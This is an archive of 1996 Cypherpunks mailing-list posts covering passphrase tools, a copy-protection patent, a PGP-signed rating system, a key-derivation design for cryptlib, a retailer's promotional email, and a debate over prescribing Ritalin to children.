To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <960706235319_428841777@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-06 21:46:03 EDT, stend@grendel.austin.texas.net
(Firebeard) writes:

<< 	It's also trivial enough to be done by 99% of the people on
 cypherpunks in their sleep.  As for realy secure systems, they aren't
 on the net, they don't have dialups, and you access them from vaults.
  >>
Yes. But let me ask you this. Have you done it yet?? I doubt it. And if ya
needed it.. and someone had it...wouldnt you just say.. Uh.. OK.. Ill take it
rather than spend my precious time on it. Exactly. 
Later.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 7 Jul 1996 17:25:52 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: CCC Crypto Lock
In-Reply-To: <199607061734.NAA18987@unix.asb.com>
Message-ID: <Pine.3.89.9607062313.A27343-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 6 Jul 1996, Deranged Mutant wrote:

> On  6 Jul 96 at 4:10, anonymous-remailer@shell.port wrote:
> 
> > MicroPatent, 4 July 96
> [..]
> > Abstract: Disclosed systems and methods for protecting a 
> > software program from unauthorized use and copying 
> > through the removal at least one of a plurality of 
> > instructions comprising a software program, and 
> > encrypting the removed instruction utilizing an 
> > encryption algorithm to produce an encrypted instruction, 
> > the encryption algorithm responsive to a randomly 
> > generated key. 
> 
> Would certain computer  viruses be considered prior art here? (Be it 
> that they encrypt for the purposes of hiding rather than copy 
> protection though.)
> 
> 
> 
> Rob.
> 

Possibly, when looked on in a narrow venue. Polymorphic viruses exhibit 
this as only one characteristic though. It would be a tough sell in my 
book. Unless the patent's author stipulates in his method that this issue 
is the basis for the claim and that his claim is unique because of this 
method - then it just one step of many from point A to B.

As a hunch, I would suspect that Vault Corp. may have existing code that 
might qualify as prior art. Dave Lawrence and a few of his coding buddies 
spent several years staying one step ahead of software products like 
copyright, and it is concievable that some of this methodology may have 
been employed to do so.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 09:04:32 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <199607062132.QAA00782@manifold.algebra.com>
Message-ID: <199607062156.XAA28423@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

An Igor-like entity wrote something like this:
>
> Yes, it can be. When I was writing it I had in mind that I want
> to write a general moderation bot that can be _applied_ to USENET.
> 
> There is a script processApproved which is called when a message 
> should get posted. If you replace the usenet version of processApproved
> to mailing list version, you will be done.


Nice design.  :-)


> > Anybody wanna hack a perl
> > script or two to produce/consume content/author ratings for
> > cypherpunks (it could surely use some!).  We can use my dormant
> > mailing list, c2punks@c2.net, as a parallel channel to transmit
> > cypherpunk (and maybe other) ratings.
> 
> So, what you want is a tool that accepts "unmoderated" cpunks list,
> selects messages by authors with high ratings, and forwards only
> these into the "filtered" list? That's neat _if_ ratings are done
> by people whose tastes are similar to mine..


Hm.  That might be an interesting addition to my plan, but the 
first step is to generate ratings and to consume them at each
individual's mail-handling site.  So I, for example, would run a
script every time I received mail (or every hour, or every day,
etc) which looked for ratings certificates, PGP-verified them,
and saved the rating in a database.  Then I would run another
script (every time I received mail, or every hour, etc.) which
identified incoming messages and _did_ something to them if 
there were sufficient ratings in the database to merit _doing_
something to them (e.g. delete, promote to a "well-rated"
folder, demote to a "poorly-rated" folder, forward to my
friends, forward to my enemies, etc.).


Now as you astutely note, this is only valuable if you like the
ratings.  Thus it is necessary to have meta-ratings.  The
simplest meta-rating is "rate raters by hand".  That is, you
manually make a list of (potential) raters and put their public
key ID and a coefficient indicating how much you value their
ratings into a meta-ratings database.


More complicated meta-ratings include "how often did I agree
with them", true (acquired from other people) meta-ratings,
and... um..  automated textual analysis or whatever other whacky
heuristic you want to plug in.


This could be so much fun...


Bryce

P.S.  Oh yeah... The demo.  Just a sec.



Return-Path: ichudov@manifold.algebra.com
Received: from galaxy.galstar.com (galaxy.galstar.com [204.251.80.2]) by digicash.com (8.6.11/8.6.10) with ESMTP id XAA26531 for <bryce@digicash.com>; Sat, 6 Jul 1996 23:35:45 +0200
Received: from manifold.algebra.com (manifold.algebra.com [204.251.82.89]) by galaxy.galstar.com (8.6.12/8.6.12) with ESMTP id QAA11089; Sat, 6 Jul 1996 16:32:06 -0500
Received: (from ichudov@localhost) by manifold.algebra.com (8.7.5/8.6.11) id QAA00782; Sat, 6 Jul 1996 16:32:39 -0500
Message-Id: <199607062132.QAA00782@manifold.algebra.com>
Subject: Re: Need PGP-awareness in common utilities
To: bryce@digicash.com
Date: Sat, 6 Jul 1996 16:32:38 -0500 (CDT)
Cc: ichudov@algebra.com, cypherpunks@toad.com, e$@thumper.vmeng.com
Reply-To: ichudov@algebra.com (Igor Chudov)
In-Reply-To: <199607062117.XAA25154@digicash.com> from "bryce@digicash.com" at Jul 6, 96 11:16:59 pm
From: ichudov@algebra.com (Igor Chudov @ home)
X-No-Archive: yes
X-Mailer: ELM [version 2.4 PL24 ME7]
Content-Type: text

bryce@digicash.com wrote:
> You know, Igor...
> (It has been a few months since I was hot on this idea, but
> hearing about your practical PGP successes has gotten me
> interested again...)
> 
> If you have a moderation bot for a Usenet group (and could it be
> pressed into service as a mailing list handler I wonder?), this

Yes, it can be. When I was writing it I had in mind that I want
to write a general moderation bot that can be _applied_ to USENET.

There is a script processApproved which is called when a message 
should get posted. If you replace the usenet version of processApproved
to mailing list version, you will be done.

> would be a nice tool to start with in order to implement
> full-fledged content/author ratings. 

Well, STUMP is a generic moderation tool.

> Anybody wanna hack a perl
> script or two to produce/consume content/author ratings for
> cypherpunks (it could surely use some!).  We can use my dormant
> mailing list, c2punks@c2.net, as a parallel channel to transmit
> cypherpunk (and maybe other) ratings.

So, what you want is a tool that accepts "unmoderated" cpunks list,
selects messages by authors with high ratings, and forwards only
these into the "filtered" list? That's neat _if_ ratings are done
by people whose tastes are similar to mine..

> Let me know.  We _could_ adopt the ridiculously simple NoCeM
> protocol, or the ever-mutating public key certificates being
> designed in a nearby mailing list, or some protocol of our own.
> (Shouldn't be too hard to come up with an implementable, useful
> protocol.)

?????

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd7hAkjbHy8sKZitAQGGwwMAtgHInUGs0ugyLJKSzigjNoZ3Tdu3NW7X
NgQkc+1ZyJz8ev43FM2knFmp7F8pImP5wZU9l6swJKsSXuzc7TRi6rObaLdOIVEY
4j0y/UWGGE6O+vGtavzjYOLiuVG7uoWk
=RwfO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 08:40:07 +0800
To: cypherpunks@toad.com, e$@thumper.vmeng.com
Subject: demo rating
Message-ID: <199607062159.XAA28958@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Certificate-Type: Chudov/Wilcox Content/Author Rating

Rating-Type: Content

Object-ID: Date: Sat, 06 Jul 1996 23:16:59 +0200/From: bryce@digicash.com

Topicality: 10
Entertainment: 10
Value: 10

Signer: 0x2c2998ad
Timestamp: Sat Jul  6 23:59:15 MET DST 1996
Signature: <wrapped>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd7hzkjbHy8sKZitAQE2EgL/SzCdEDihADRwDnGMy/GmkUF/3z082FRz
uv0QbyR32Se15q+nkNZoj0vrMB9oFdFDv5fFON7oun3kLN+BukCAQTwta2+CYaIQ
F6CwqeZz5TdAFYLB8lrgM0jAQDNaIiI6
=q+l+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 08:55:19 +0800
To: cypherpunks@toad.com, e$@thumper.vmeng.com
Subject: ratings
Message-ID: <199607062201.AAA29101@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Of course a real rating would be signed by my ratings private 
key and not by my e-mail private key.  I might start a service
where I will pay you for your ratings and then distribute them
for a fee.  (Note that you get paid for generating ratings, as
long as your ratings get good meta-ratings.  You have to pay to
use other people's ratings.  This is how it should be.)


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd7iRkjbHy8sKZitAQGTEQL+IchRcLv9r7/WpDQb8tmJ0QJD7tN8KUNG
AEX/UtzApwffH2kS90ThHVnsVt/8WKgI+WfsZ0Z0PtYoE5uLwBUJDzXydbZ8zHEx
B5Ti4pfF0wuXwWD6kA/ISYyhZHRewcol
=Dwsd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 7 Jul 1996 17:47:32 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: CCC Crypto Lock
In-Reply-To: <Pine.GUL.3.94.960706160110.26242B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9607062348.A27343-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 6 Jul 1996, Rich Graves wrote:

> On Sun, 7 Jul 1996, Tim Philp wrote:
> 
> > The fact that this patent was issued indicates to me that the patent office
> > does not understand computer technology.
> 
> Gee. Next you'll be telling us that the US Congress isn't always sensitive
> to libertarian issues.
> 
> -rich
> 

Don't rush to judge too quickly. Software patents (For the most part) are 
*not* really understood by the patent office. Why do you think Compton's 
slid one by on Multi-media ? Fortunately, there was so much fuss set up 
over that one, the office pulled it for review. 

All it takes is someone "skilled in the art" to backup your claim that 
method "A" is provably workable...

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 7 Jul 1996 18:40:37 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.LNX.3.94.960706224526.1124A-100000@gak>
Message-ID: <199607070742.AAA26296@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark M." <markm@voicenet.com> writes:

 > While the psychiatric profession has invented many bogus
 > diseases, that does not mean that the profession has no
 > credibility. Remember that psychology is little more than
 > philosophy.  Abnormal behavior patterns don't necessarily
 > mean that a child has a disorder or disease.  However, if
 > the child experiences physical symptoms, then a chemical
 > imbalance in the brain is not that farfetched.

There are, of course, real mental illnesses with underlying
pathology, like schizophrenia, bipolar disorder, and clinical
depression.

I'm not sure the existence of genuine mental illness makes the
psychiatric profession credible, however, when they are all too
willing to climb in bed with the latest political fad.

Recall those "experts" during World War I who explained with
prefect seriousness to the American public that the reason the
Germans' heads fit so well into those pointy helmets was that
their brains were missing the part that distinguished right from
wrong.

Adolescent Psychiatric Imprisonment and Insurance Fraud are a
multi-million dollar well-organized business in the United
States, and talk shows are filled with women who split into 1,000
different personalities, some of them alien visitors, after being
traumatized by some sexual oddity.

 > First of all, a child is considered to have "school phobia"
 > when the child refuses to go to school and also has severe
 > anxiety attacks, vomiting, and nausea.

Goodness gracious, you make these people sound almost reasonable.
I remember last year one local TV station did a piece on "school
phobia", and the wonderful drugs that could be used to treat it.
The kid profiled simply didn't like school, and refused to attend
it, and the list of symptoms given to help parents recognize the
disorder were entirely attendance related.

Of course, with enough Mellaril in your system, you can probably
put up with just about anything.

 > Attention Deficit Disorder is hardly nonsense; it's a
 > disorder found to be partly hereditary and strongly linked
 > with clinical depression.

ADD people are simply the upper 5-10% of the population with
regard to behavioral traits which make learning more difficult.
Of course such things can be hereditary and of course people who
can't live up to expectations placed upon them sometimes get
clinically depressed.

The thing to remember here is that we are looking at things which
show continuous normal variation in any population, like height
and hatsize, and the people who are being labeled and treated
here are hardly some huge number of standard deviations away from
the norm.

 > There are real illnesses, and there are fake ones.  Just
 > because the psychiatic profession does attribute certain
 > behavior to some non-existent illness doesn't mean there is
 > any reason to not believe in any psychological maladies.

Which of course is not the issue here.  No one has stated that
legitimate mental illness does not exist, merely that the
profession has a tendency to use creative imagination where a
market or political pressure exists.

 > It's surprising to me that people consider the Unabomber
 > "insane" but yet do not believe that many very real mental
 > illnesses and disorders exist.

Insanity is a legal term which by its very construction, is an
almost impossible set of criteria to meet.  It has nothing to do
with any scientific definition of mental illness.  You can be
completely bonkers and carrying on meaningful conversations with
wall ornaments, and the government will be more than happy to fry
you in the electric chair.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Sun, 7 Jul 1996 16:33:52 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
In-Reply-To: <1cJNqD2w165w@bwalk.dm.com>
Message-ID: <Pine.GSO.3.94.960707014022.29076A-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jul 1996, Dr.Dimitri Vulis KOTM wrote:

> K3wl Hack, D00dz!  Why don't you post it to coderpunks - it's probably way
> too technical for cypherpunks.  I wonder if the util comes with the source
> code, and what language it's written in.

	It's 10K long (the exe file), so it's probably programmed in
Pascal, not Assembler, which would probably be more efficient.

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sun, 7 Jul 1996 00:39:49 +0800
To: cypherpunks@toad.com
Subject: Transforming variable- to fixed-length keys
Message-ID: <199607061347.BAA08574@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


In preparing the next version of cryptlib (which is going to have some cool
features when it's ready, which should be before the end of the millenium),
I've run into a problem in writing a general-purpose n-byte input to m-byte
output transformation function.  What this does is take an arbitrary-length
user key and transform it to a fixed-length encryption key (for example an
entered passphrase into a 112-bit triple-DES key).  The constraints on memory
usage are:
 
- The input (user) key can't be altered (you can't change data passed in by the
  caller)
- The user key can't be copied to an internal buffer (it can be of arbitrary
  length, and is sensitive material so shouldn't be copied elsewhere)
 
In other words there's no temporary storage available apart from what's
provided in the output key.  This is almost always a different length from the
input key.
 
Some other constraints are:
 
- The transformation must be algorithm-independant (it shouldn't, for example,
  rely on SHA1 to transform an input string into a fixed output of 160 bits and
  assume you'll never need a key longer than 160 bits).
 
This means you can't just use a single pass of a hash function to generate the
output key, since the output can be smaller or larger than the hash function
output.
 
- The transformation must be able to be iterated to make a password-guessing
  attack harder to perform.
 
This one is tricky, since the lack of temporary buffer space means you can't
just feed the output back to the input and iterate.
 
Here's my initial approach, if anyone has any comments to make on this or knows
of a better way to do it, please let me know.
 
Peter.
 
-- Snip --
 
Initially, the user key is passed in as a byte string:
 
    +-------------------------------------------------------+
    |                      User Key                         |
    +-------------------------------------------------------+
 
The first stage in the key hashing prepends the length of the string as a
big-endian 16-bit count to the user key:
 
    +------+-------------------------------------------------------+
    |Length|                      User Key                         |
    +------+-------------------------------------------------------+
 
The aim of the hashing is to reduce this variable-length input string to a
fixed-length key appropriate to the encryption algorithm being used.  This is
done by treating the user encryption keys as circular buffers and repeatedly
hashing chunks of the user key and xoring the result into the output buffer.
Thus the first chunk of the encryption key would be obtained with:
 
    +------+-------------------------------------------------------+
    |Length|                      User Key                         |
    +------+-------------------------------------------------------+
     |                            |
     |                       _  /
     |  Hash           _  /
     |           _  /
     |        /
     |      |
    +-----------------------+
    |     Encryption Key    |
    +-----------------------+
 
The second chunk of the enryption key would be obtained with:
 
    +------+-------------------------------------------------------+
    |Length|                      User Key                         |
    +------+-------------------------------------------------------+
             |                            |
             |                       _  /
             |  Hash           _  /
             |           _  /
             |        /
             |      |
    +-----------------------+
    |     Encryption Key    |
    +-----------------------+
 
Since the input to the hash function is much larger than its output, a
significant amount of the user key affects each chunk of the encryption key.
The size of each "chunk" is determined by the hash function being used.  For
example with the MD4 hash function, 64 bytes of user key affect each 16 bytes
of encryption key.
 
Once the end of the user key or encryption key buffer is reached, the hash
function wraps around to the start of the buffer and takes its data from there.
A pass over the user key is considered complete when the hash function input
has wrapped around completely and is back at the start of the buffer.
 
The amount of wraparound depends on the length of the user and encryption keys.
For example with 8-byte (strictly speaking 56-bit) DES keys even a single
application of MD4 will wrap around the encryption key buffer twice, shrinking
up to 64 bytes down to 8 bytes in a single operation.  On the other hand a
4-byte user key will wrap the user key buffer around twice, expanding it to
fill 8 bytes of the encryption key buffer (without, however, actually giving 8
bytes of effective key space).
 
In order to avoid repeatedly hashing the same data (which results in the output
key cancelling out every second round), the input data is varied by adding the
iteration count mod 256 to each byte before it is hashed.  Therefore for five
rounds of key hashing the user key "This is a key" would give the following
effective input to the hash function:
 
  \x00\x0DThis is a user key
  \x01\x0EUijt!jt!b!vtfs!lfz
  \x02\x0FVjku"ku"c"wugt"mg{
  \x03\x10Wklv#lv#d#xvhu#nh|
  \x04\x11Xlmw$mw$e$ywiv$oi}
 
[Is this nice?  Problems are that you might be able to perform some sort of
 related-key attack, and that if you know the input value to round n you can
 get the input value to round n+m without having to go through all m rounds.
 However I can't see how this would aid an attacker].




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 11:25:05 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <v02120d19ae04adc45a15@[192.0.2.1]>
Message-ID: <199607070030.CAA05537@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Lucky wrote something like:
>
> As has been discussed in numberous previous threads on this topic, even a
> passive rating system is very hard to implement. The computer doesn't know
> if you hit delete because the post was garbage or because you are running
> late on some project.


What's the difference?  All practical measure of value is in 
comparison to competing objects.  This _does_ mean that your
"approvalness" coefficient goes up and down as your situation
changes, but it doesn't mean that your rating becomes
meaningless.  Hm.  If it happened that a bunch of prolific
raters got busy, ratings across the board would go down.  (Seems
statistically unlikely, but still...)  Then when they went back
up there would be a "burst of activity" effect.  :-)


Possibly what I like most about ratings and micropayments is how
the quantify previously unquantified human behavior.  We've all
seen the "burst of activity" on a mailing list or at a party, or
on a stock market, right?  Well that is just people's ratings
all pushing each other up!


> An active rating system is virtually impossible to
> implement, given the added workload on the readers.


Which is where the small payments to ratings producers from
ratings consumers comes in.  Again this is just the
quantification of a phenomena that we all take for granted.
(Namely, that people who produce quality ratings are producing a
value and trading/contributing it to others.)


("'Just' the quantification", I said !!  That might seem like a
hilarious understatement someday.)


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd8FO0jbHy8sKZitAQEBoQMAmMtQg0cTrdXpHf07p1sYVUPAnJq+Jp1v
/g6CqYu/YwIRHmnHyLmCehqB74xYJ6sjOLmKaYXd12f1oFUJL9rsx2LAEiPNeAMb
gSClZhpUu++CE+PfH8GlOZ1E/75ZcIx0
=V0z6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 8 Jul 1996 01:09:59 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.91.960707091156.13459A-100000@tipper.oit.unc.edu>
Message-ID: <Pine.SUN.3.91.960707072212.27417A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 7 Jul 1996, Simon Spero wrote:

> On Sat, 6 Jul 1996, Timothy C. May wrote:
> > 
> > ...she includes several "Ritalin"
> > capsules with instructions on how to dose her son with this
> > depressant/behavior modification drug.
> 
> Er... Tim... Ritalin is an amphetamine. 

Yes, normally, but doesn't it have a paradoxical reaction for
hyperactive children (i.e., it acts as a depressant for them)?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 8 Jul 1996 02:10:28 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.91.960707072212.27417A-100000@crl6.crl.com>
Message-ID: <199607071543.IAA26229@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy writes:

> Yes, normally, but doesn't it have a paradoxical reaction for
> hyperactive children (i.e., it acts as a depressant for them)?

So the medical profession tells us.  It's a curious message.  College
students who take methamphetamine during exam week to increase their
alertness and performance are criminals, and bomber pilots and kids
who take this or a similar drug for the same reasons are not.

"Just Say No to Drugs Big Brother Doesn't Give You"

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 7 Jul 1996 23:37:17 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <ae041171000210048a97@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960707091156.13459A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jul 1996, Timothy C. May wrote:
> 
> When the mother (a single mother, as this is California) drops her son off
> with my friend (also single, of course), she includes several "Ritalin"
> capsules with instructions on how to dose her son with this
> depressant/behavior modification drug.

Er... Tim... Ritalin is an amphetamine. 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 7 Jul 1996 23:46:11 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: NYT/CyberTimes on CWD article
In-Reply-To: <ae049d8601021004b2d9@DialupEudora>
Message-ID: <Pine.SUN.3.91.960707091822.13459B@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Actually, no matter what scheme you use, you are always vulnerable to a 
quite practical brute force attack- simply treat the filter as an oracle, 
and feed it the result of a 'web-crawl'. 

Simon


---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-mblvd@telebase.com
Date: Mon, 8 Jul 1996 02:13:13 +0800
To: mblvd@musicblvd.com
Subject: Exciting News on Music Boulevard
Message-ID: <199607071407.KAA01680@telebase.com>
MIME-Version: 1.0
Content-Type: text/plain




Dear Friends of Music Boulevard:

We're excited to announce a major redesign of Music Boulevard, 
the Ultimate Online Music Store(tm).  We invite you - as someone
who has visited and/or opened an account with us - to check out 
our new look at WWW.MUSICBLVD.COM!

Many of the changes and improvements we have made are in response 
to your feedback.  The new Music Boulevard is faster, contains more
content, and is easier to navigate.  Our fantastic collection of 
music magazines and Billboard(r) charts are now available to everyone!  
We think you'll really enjoy shopping in our new environment.

We are also pleased to introduce the Music Boulevard Frequent Buyers 
Club. Membership in the Frequent Buyers Club is free. Once you sign-up, 
you will be rewarded with a free CD of your choice for every 10 you 
purchase!  

As always, we continue to provide the best Customer Service of any 
site on the internet.  We have recently added more customer service
representatives who will be glad to assist you with your inquiries.

We'd like to thank you for visiting Music Boulevard, and we'd be
very interested in your feedback on our new interface. If you have 
any questions, feel free to contact us at 1.800.216.6000 or
610.293.4793.  Our email address is service@musicblvd.com.

Sincerely,

The Music Boulevard Staff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 8 Jul 1996 05:30:49 +0800
To: Sandy Sandfort <ses@tipper.oit.unc.edu>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607071816.LAA19127@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



> > Er... Tim... Ritalin is an amphetamine. 

At 07:25 AM 7/7/96 -0700, Sandy Sandfort wrote:
> Yes, normally, but doesn't it have a paradoxical reaction for
> hyperactive children (i.e., it acts as a depressant for them)?

Not really:  Ordinary college students who use it to facilitate
cramming report that it has the same effect on them as on hyperactive
children.

A well known symptom of amphetamine abuse is that the abusers will
cheerfully persist in pointless and boring activities for hours
on end, such as folding paper bags or stirring long overcooked 
spaghetti.

Furthermore, people generally have to be forced by the threat of
violence to take depressant drugs, especially neuroleptics, whereas
everyone cheerfully takes their Ritalin.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 8 Jul 1996 02:09:25 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.SUN.3.91.960707091156.13459A-100000@tipper.oit.unc.edu>
Message-ID: <cTBPqD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

> On Sat, 6 Jul 1996, Timothy C. May wrote:
> >
> > When the mother (a single mother, as this is California) drops her son off
> > with my friend (also single, of course), she includes several "Ritalin"
> > capsules with instructions on how to dose her son with this
> > depressant/behavior modification drug.
>
> Er... Tim... Ritalin is an amphetamine.

Yes, it's an _anti-depressant, supposedly turning up those pieces of the brain
responsible for "tuning out" outside interference, and letting the hyperactive
kid concentrate.  But a true cypherpunk never lets any facts interfere with his
political agenda.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Myers <blackavr@aa.net>
Date: Mon, 8 Jul 1996 05:19:07 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960707181403.0068e0c4@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 AM 7/7/96 -0700, Sandy Sandfort <sandfort@crl.com> wrote:

>Yes, normally, but doesn't it have a paradoxical reaction for
>hyperactive children (i.e., it acts as a depressant for them)?

As one of those "ADD" kids back in the '70's, the dextroamphetamine
I was given actually did seem to calm me down. Of course, coffee
also put me to sleep then. Happily, that situation has reversed 
itself as I've grown older. *grin*
--
/^^^^^^^^^Instead of being born again, why not just GROW UP?^^^^^^^^^^^\
Michael Myers                   Vote Libertarian....you'll sleep better!
Don't like abortion? Don't have one.     Don't like guns? Don't buy one.
blackavr@aa.net                          E-mail for PGPv2.6.2 public key
\____________ http://www.aa.net/~blackavr/homepage.htm ________________/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Mon, 8 Jul 1996 05:14:53 +0800
To: Simon Spero <cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <v02140b01ae05aff1e8ee@[17.219.103.246]>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero comments on Tim May's Ritalin rant:
>On Sat, 6 Jul 1996, Timothy C. May wrote:
>>
>> When the mother (a single mother, as this is California) drops her son off
>> with my friend (also single, of course), she includes several "Ritalin"
>> capsules with instructions on how to dose her son with this
>> depressant/behavior modification drug.
>
>Er... Tim... Ritalin is an amphetamine.
>

Yup, and it was the illegal drug of choice in Sweden in the 1960's,
making its use as a convenient way to quiet down rambuncious kids
a bit strange -- but the "medical professionals" have an explanation.

Interestingly, it is illegal to hit kids in Sweden -- the courts
call it assault, just as if you hit an adult. When I lived there
(in the '60 and '70s), I took an informal survey and found only
one person who had ever been spanked as a child -- and only once,
for breaking her brother's violin.

A good friend would infrequently give her infant a pat on the
bottom (when he tried climbing on the stove), but was always
careful to aim for the well-padded diaper.

You may wish to consider whether Sweden's low murder rate is
related to the lack of parent-child violence.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
